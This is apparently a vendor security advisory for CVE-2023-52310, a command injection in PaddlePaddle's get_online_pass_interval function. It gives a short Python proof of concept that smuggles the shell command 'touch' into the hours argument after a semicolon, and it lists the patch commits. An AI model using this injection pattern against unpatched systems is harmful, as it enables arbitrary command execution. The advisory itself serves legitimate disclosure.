CVE-2023-52310
Command injection in get_online_pass_interval which could lead to execute arbitrary commands. The PoC is as follows:
from paddle.incubate.distributed.fleet.fleet_util import FleetUtil
fleet_util = FleetUtil()
online_pass_interval = fleet_util.get_online_pass_interval(
days="{20190720..20190729}",
hours="9;touch /home/test/aaaa",
split_interval=5,
split_per_pass=2,
is_data_hourly_placed=False
)We have patched the issue in commits 1aae481dfd7d2055c801563e254f1484b974b68e, c62d87eb91c84154af40946f17205d86f608866b and f8560c903c80450e37b8f304a9cd8207678f2f83. The fix will be included in PaddlePaddle 2.6.0.
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
This vulnerability has been reported by huntr.com and leeya_bug.